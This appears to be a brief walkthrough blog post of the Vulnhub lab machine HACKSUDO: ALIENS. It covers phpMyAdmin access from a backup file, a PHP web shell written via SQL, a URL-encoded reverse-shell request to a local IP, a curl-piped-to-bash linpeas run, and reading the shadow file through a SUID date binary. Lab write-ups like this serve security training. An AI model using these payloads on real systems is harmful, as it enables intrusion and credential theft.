This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh)
This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION which was LFI to SSH login to editing a python script. I don’t have anymore to say about that.
SSH, plus HTTP on ports 80 and 9000.
This has got phpMyAdmin, which isn’t working with any kind of default creds. I enumerate the webserver and find some stuff, but nothing too interesting.
This has stuff about aliens. Let’s look around:
What’s in backup? mysql.bak. What’s in that?
With this, we can login to phpMyAdmin.
After I’ve looked around, grabbed some hashes and had a go at cracking them, then tried password reuse on SSH with no success, I use a SQL statement to create a PHP file on the server:
This works and I use it to get a shell:
GET /cmd1.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.192",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
I run linpeas:
www-data@hacksudo:/dev/shm$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | bash
Which shows that date has the SUID bit; GTFOBins gives a file read:
sudo date -f $LFILE
I use this to read the shadow file, and then send the hash for hacksudo to john, where it cracks. Now, we can SSH in as hacksudo.
I run linpeas again, and we have cpulimit with the SUID bit in our home directory. Again, it’s GTFOBins:
So fairly easy, but I don’t think I’ve done the SQL to outfile in phpMyAdmin before.